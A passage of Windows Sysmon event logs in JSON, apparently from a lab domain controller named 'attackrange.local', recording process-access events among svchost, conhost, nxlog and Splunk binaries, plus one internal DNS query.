C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.505","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1902,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.505\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.505","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1903,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.505\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.505","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1904,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.505\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.505","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1905,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.505\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.505","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1906,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.505\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.505","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1907,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.505\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106D-5F25-0000-00106CCB0300}\r\nTargetProcessId: 4088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.505","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106D-5F25-0000-00106CCB0300}","TargetProcessId":"4088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1908,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.661\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.661","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":1909,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.581\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nProcessId: 2116\r\nQueryName: win-dc-8400769\r\nQueryStatus: 0\r\nQueryResults: 10.0.1.14;\r\nImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.581","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-001054C00200}","QueryName":"win-dc-8400769","QueryStatus":"0","QueryResults":"10.0.1.14;","Image":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
